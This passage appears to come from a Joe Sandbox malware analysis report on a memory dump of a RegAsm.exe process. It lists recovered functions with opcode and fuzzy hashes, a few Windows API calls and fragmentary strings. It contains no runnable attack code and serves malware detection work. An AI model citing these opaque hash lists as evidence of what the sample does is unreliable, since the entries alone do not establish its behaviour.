                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d22ac0c0b173eb1919838105268375d851d508c68cd57ff142b5b389bdcbe304
                                                                      • Instruction ID: b2b5ecf074de91ac914dfd965cb03f707f4f16325c0c4ea283c80723a3d79eb4
                                                                      • Opcode Fuzzy Hash: d22ac0c0b173eb1919838105268375d851d508c68cd57ff142b5b389bdcbe304
                                                                      • Instruction Fuzzy Hash: 8F714A742083518BD710DF18D890B2BB7F0FF96744F94192EE4D19B361D3799909CB9A
                                                                      Function 004091F0 Relevance: .2, Instructions: 202COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: fe22b2f1523c9728c54192698233e5564d6db77466d882a97c05fe3809ff67cf
                                                                      • Instruction ID: 74377abc01be29dba5f3574a8361ef8460b3e5f34b7c9c05be143a1f22df5017
                                                                      • Opcode Fuzzy Hash: fe22b2f1523c9728c54192698233e5564d6db77466d882a97c05fe3809ff67cf
                                                                      • Instruction Fuzzy Hash: C2619A79609302CFD318CF25D8903AAB7E2FB89306F08C97CE984822A5C779D959DF45
                                                                      Function 0043EF50 Relevance: .2, Instructions: 189COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 75c3e7660cebeb35403fb5e171a61a3583f9db5666e03dd2ca4b7871bec4d933
                                                                      • Instruction ID: c00be4d41a0304ea6ce13eecc6499725f03711e281a0341f2dbc33ca0e0599d6
                                                                      • Opcode Fuzzy Hash: 75c3e7660cebeb35403fb5e171a61a3583f9db5666e03dd2ca4b7871bec4d933
                                                                      • Instruction Fuzzy Hash: 26515EB19087548FE714DF29D89435BBBE1BBC8318F444A2EE4E587351E379DA088F86
                                                                      Function 00438C00 Relevance: .2, Instructions: 185COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d72acbbd7377a4364bca26e5100232256b15d0ea39b950b589fe2db1b198ccfd
                                                                      • Instruction ID: cf93265e453f1b4f50de29a8b8c3f842b101a0cdbe79ed852c4bee78df836707
                                                                      • Opcode Fuzzy Hash: d72acbbd7377a4364bca26e5100232256b15d0ea39b950b589fe2db1b198ccfd
                                                                      • Instruction Fuzzy Hash: 6A51193A60979147D718593C5C113B9EA434BAB334F2DA36FF9B2473D1CA1D48065399
                                                                      Function 00405D20 Relevance: .2, Instructions: 163COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3fb784b57021d17c2da16b2eb1e48beda536bd8e8057a2e69ade5c5409e6bff6
                                                                      • Instruction ID: a8df0a3c83d2a2110b9e98db97d42556f66ce4b46fc752b3147b0d49ab485b89
                                                                      • Opcode Fuzzy Hash: 3fb784b57021d17c2da16b2eb1e48beda536bd8e8057a2e69ade5c5409e6bff6
                                                                      • Instruction Fuzzy Hash: B35190B5A046019FC714DF18C480927B7A1FF85324F19467EF899AB392D639EC42CF9A
                                                                      Function 00449B60 Relevance: .1, Instructions: 142COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 61d0137ac8db55894e61deab45fae808b6956607a8738703e62f5a3786923e60
                                                                      • Instruction ID: 6773b3426544a07c00623eb10f663d771092178658317beae7ed4357cd2a5b97
                                                                      • Opcode Fuzzy Hash: 61d0137ac8db55894e61deab45fae808b6956607a8738703e62f5a3786923e60
                                                                      • Instruction Fuzzy Hash: 87418A35A14212CFDB44CFA8E9E166EB3B1FB49312F19407AD905A7362C774EE20CB65
                                                                      Function 00411420 Relevance: .1, Instructions: 130COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b2b423ebadf1592669d7d863c5a3ee5f5f2eab39b8738c23b7edf78d6bbbe3fc
                                                                      • Instruction ID: 56fe226764b8c279c2f95357b1d9cf27a8c0a2024e96dee972e1ff8b9330b8b4
                                                                      • Opcode Fuzzy Hash: b2b423ebadf1592669d7d863c5a3ee5f5f2eab39b8738c23b7edf78d6bbbe3fc
                                                                      • Instruction Fuzzy Hash: 6E4114722183650FD30CDF39889037ABBD2AB89310F098A3EE5E6C73A1E678C945D715
                                                                      Function 00404C10 Relevance: .1, Instructions: 95COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 08c903a2774bc6df5269ec9394e4d2b4249a1b345d6e6f96374d041045904a8a
                                                                      • Instruction ID: c79a31c9f9310a5d27d3133cd9e14fd18c2759f751e933cf278d23621f9b5f89
                                                                      • Opcode Fuzzy Hash: 08c903a2774bc6df5269ec9394e4d2b4249a1b345d6e6f96374d041045904a8a
                                                                      • Instruction Fuzzy Hash: 7A31CBB060D2009BE7149F59D884927B7E1EFC5318F15893EE99AA7391D339DC42C74A
                                                                      Function 0043B510 Relevance: .1, Instructions: 64COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                      • Instruction ID: b05e4e55af9010276dd824703dcfe013dc4d2d587545692900b47515503f7f9a
                                                                      • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                      • Instruction Fuzzy Hash: 7C110633A051D40EC3128D3C8440665BFE34A9B339F1D939AE4B89B2D2D7268D8A8399
                                                                      Function 004381AA Relevance: .1, Instructions: 63COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4f9c2bea97cd4b5019ae85a024de50666d4b8a38e840c2ed61b965e1ee9b65ad
                                                                      • Instruction ID: 9af3802c06223be0731618dc7dbb9ccf8b70dac9e7fe2982a45eb8f2898826f2
                                                                      • Opcode Fuzzy Hash: 4f9c2bea97cd4b5019ae85a024de50666d4b8a38e840c2ed61b965e1ee9b65ad
                                                                      • Instruction Fuzzy Hash: BA21E9F0900B40AFD360EF3AC94674BBEF8EB45350F104A1EF8AA87690D371A4058BD6
                                                                      Function 00430BD0 Relevance: .1, Instructions: 63COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 280971b818c92cda73003084fe35fa709fc308098d1831b144d262705e9ce05f
                                                                      • Instruction ID: b670d169a067c456f2208e1d1a858f62b16ae88675da2f6f7e379deb6076660f
                                                                      • Opcode Fuzzy Hash: 280971b818c92cda73003084fe35fa709fc308098d1831b144d262705e9ce05f
                                                                      • Instruction Fuzzy Hash: F70192B570030187E7249E5194E0B3BF2A9AB88718F18273ED40657341DB7DEC05C699
                                                                      Function 00445D80 Relevance: .1, Instructions: 52COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a0f5b615599201c8fcbc61bbc80d2da29338f02ce58a985c5e93859dfe3cbdcf
                                                                      • Instruction ID: 127a2d2f99be075313f8e7c8ce123115a8f99d52567ae3d6d9a7df168031d728
                                                                      • Opcode Fuzzy Hash: a0f5b615599201c8fcbc61bbc80d2da29338f02ce58a985c5e93859dfe3cbdcf
                                                                      • Instruction Fuzzy Hash: C71149B0918380AFE704DFA4D54491FFBE4AB82708F50982DF4D487342D739D909CB5A
                                                                      Function 00407120 Relevance: .0, Instructions: 46COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2bca8451c7a21ffdc08514427d5aae7525460325ea45c90652cec291e1702db1
                                                                      • Instruction ID: 428b66cca32f92671de047a37f04ba4cdfb14e9a1c088c886c69018fb4604205
                                                                      • Opcode Fuzzy Hash: 2bca8451c7a21ffdc08514427d5aae7525460325ea45c90652cec291e1702db1
                                                                      • Instruction Fuzzy Hash: 14F02B36B582160BD718CE55ECE0D77B366D7CA255B09003EDA42E73C1C974F806D269
                                                                      Function 0041A880 Relevance: .0, Instructions: 38COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7a262c98f02bee36f9e7b41f4a9b905533450b75733afa39f2542f44ca0caaf6
                                                                      • Instruction ID: 84a41c4c3f528dc72163e8ca054b40d510caf23feb84efc27826b8445e6de5a1
                                                                      • Opcode Fuzzy Hash: 7a262c98f02bee36f9e7b41f4a9b905533450b75733afa39f2542f44ca0caaf6
                                                                      • Instruction Fuzzy Hash: 0CF0ECB1B0411067DB22B9559CC0FF7BB9CCB87364F190416E84957282E2755CD6C7EB
                                                                      Function 00442280 Relevance: .0, Instructions: 21COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
                                                                      • Instruction ID: ca0a47249e4e9b4ad93b56322b99e3a16fb2ee89d7d4b9e5124314e38bcc9f3b
                                                                      • Opcode Fuzzy Hash: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
                                                                      • Instruction Fuzzy Hash: 57D05E2160862146BB688E19A500977F7E0FAC7B11B89959FF582E3248D274DC41C2AD
                                                                      Function 004371AB Relevance: 29.8, APIs: 2, Strings: 15, Instructions: 89COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$ClearInit
                                                                      • String ID: !$#$($-$0$2$4$7$8$9$?$?$H$V$e
                                                                      • API String ID: 2610073882-164105402
                                                                      • Opcode ID: 7ea49bbc964831e1d19dd7b4cdbf91261241450e64375c5e647d5cd4bb619ec2
                                                                      • Instruction ID: e486607e4b5c263a131017f9b849749757e5c2ed8deb2f4ba38f941ca55cc11a
                                                                      • Opcode Fuzzy Hash: 7ea49bbc964831e1d19dd7b4cdbf91261241450e64375c5e647d5cd4bb619ec2
                                                                      • Instruction Fuzzy Hash: CC41F9600087C18ED726CF2984C8606BFA16F16224F488ADDD8E54F7DBC775D519C7A6
                                                                      Function 00435993 Relevance: 29.8, APIs: 2, Strings: 15, Instructions: 81COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$ClearInit
                                                                      • String ID: !$#$($-$0$2$4$7$8$9$?$?$H$V$e
                                                                      • API String ID: 2610073882-164105402
                                                                      • Opcode ID: 1f1cf35395537e64b000c6efbc98a63c107d8345a00cbe81b9758d42e2734ac3
                                                                      • Instruction ID: cdf3b5065cd44c78a25137ca5eabd9af70e9919f95baf298e5e50d8634074577
                                                                      • Opcode Fuzzy Hash: 1f1cf35395537e64b000c6efbc98a63c107d8345a00cbe81b9758d42e2734ac3
                                                                      • Instruction Fuzzy Hash: 1C41E7600087C1CED726DF2C8488606BFA06F26224F488ADDD8E54F7DBC375E519CBA6
                                                                      Function 00436BEE Relevance: 28.1, APIs: 2, Strings: 14, Instructions: 83COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$ClearInit
                                                                      • String ID: 2$a$c$e$f$g$i$q$s$u$w$y${$}
                                                                      • API String ID: 2610073882-100263010
                                                                      • Opcode ID: 7a16bc65f0334d1c2e074e8fe1d00586703c7d9acbe3629dff512b6bf4ce12e7
                                                                      • Instruction ID: 27a84024d9b4b92c8d6edf8d148b05a3a7dd72626f3d5901dcadd4859abb0c79
                                                                      • Opcode Fuzzy Hash: 7a16bc65f0334d1c2e074e8fe1d00586703c7d9acbe3629dff512b6bf4ce12e7
                                                                      • Instruction Fuzzy Hash: AD410320408B818ED715DF28C488616BFE1AB16314F088A9DD8EA4F797C379E519CBA2
                                                                      Function 00437333 Relevance: 28.1, APIs: 2, Strings: 14, Instructions: 77COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • VariantClear.OLEAUT32(04EC839E), ref: 0043733D
                                                                      • VariantInit.OLEAUT32 ref: 0043734C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$ClearInit
                                                                      • String ID: 2$a$c$e$f$g$i$q$s$u$w$y${$}
                                                                      • API String ID: 2610073882-100263010
                                                                      • Opcode ID: 8ebd9f4ed5494e62f42b018d346a7ac36c6e36cd5ee66e56a8b11b3574fb4437
                                                                      • Instruction ID: 1c9f208004a732e118f2501c515b945d844519df74fdbedcee51dd58d27ec161
                                                                      • Opcode Fuzzy Hash: 8ebd9f4ed5494e62f42b018d346a7ac36c6e36cd5ee66e56a8b11b3574fb4437
                                                                      • Instruction Fuzzy Hash: DA41D630508B818ED715DF28C584716BFE1AB16314F088A9DD8EA4F797C379E519CBA2
                                                                      Function 00428680 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 391COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 8U!W$AK$D^$I\$L!_#$dE;G
                                                                      • API String ID: 0-1822214113
                                                                      • Opcode ID: 0c4b37c98de53600dfd4ef16a9103f5cfec24dc3029a504c7249ea61c68bbd43
                                                                      • Instruction ID: e8dc5652ff6eac58c8cff6491874245c63b14013ac8cf1601e891aa925ef3829
                                                                      • Opcode Fuzzy Hash: 0c4b37c98de53600dfd4ef16a9103f5cfec24dc3029a504c7249ea61c68bbd43
                                                                      • Instruction Fuzzy Hash: ADE153B4209340ABD310DF55EA80A1FBBF0EB86B44F50492EF4C59B252D778D905CBAB
                                                                      Function 004361D5 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 165memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID: AllocString
                                                                      • String ID: -$.$/$0$1$3
                                                                      • API String ID: 2525500382-387867814
                                                                      • Opcode ID: 7940db7b379f922317e7e15a24e26e61411b35062eb14db6cbc1a2197edd3dd7
                                                                      • Instruction ID: 660070051efc564603ea8c5fbdd00a6cbbb9cf6a35b09dbfd3aeab06d863ec1c
                                                                      • Opcode Fuzzy Hash: 7940db7b379f922317e7e15a24e26e61411b35062eb14db6cbc1a2197edd3dd7
                                                                      • Instruction Fuzzy Hash: E3919260508BC38AC3268B3C8888605FFA16B67234B4887DDE5F54F7E3D364D586C7A6
                                                                      Function 0042D32D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 76fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CopyFileW.KERNEL32(00000000,?,00000000), ref: 0042D3FA
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID: CopyFile
                                                                      • String ID: PQ$Pt"m
                                                                      • API String ID: 1304948518-1097789620
                                                                      • Opcode ID: f03de7448bdfe319ee16f1179e73b3ecdf48463b6fada11a4135d79cba536ff8
                                                                      • Instruction ID: 087f67f87b232edd0faaff2b62f1293afc868e0b8f76a9560ff328a71f7fabe8
                                                                      • Opcode Fuzzy Hash: f03de7448bdfe319ee16f1179e73b3ecdf48463b6fada11a4135d79cba536ff8
                                                                      • Instruction Fuzzy Hash: 902136B4518384ABE320AF64E841B1FBBF4BB46745F40192CF2C49A261E7B58651CF5B